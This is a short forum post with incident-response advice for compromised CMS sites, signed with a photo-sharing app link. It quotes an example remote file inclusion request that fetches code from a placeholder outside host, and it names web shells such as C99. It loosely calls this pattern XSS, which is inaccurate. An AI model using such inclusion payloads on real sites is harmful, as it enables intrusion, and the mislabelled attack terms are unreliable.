|
Today is deciphering yesterday's math. Evidently:
1+1=.9
1+2=4
Not quite the result I was expecting, but, promising nonetheless. After I figure out whether it is worth figuring out the results above, I get to fix 3 bugs in Apache's code. Thank goodness for open source.
SQL Injection attacks are probably 10% of the exploits we see. Probably 80% are XSS attacks which might be a little more likely if template files have been adjusted, but, it depends a lot on the CMS. Since the template files for most CMSs that are web administered are files on the disk that need to be writeable by the apache process, you might find that the attack came through XSS -- especially if you aren't finding new username's in your database that are admins or user's that cannot log in. If you've got access to the raw logs, take a look at them to see if you see any urls like "GET /includes/database.php?includefile=http://someremotesitehostingxss.com/blah.jpg?"
If you see something like that, then you need to search your system for popular web shell programs like C99, angelshell, etc.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
|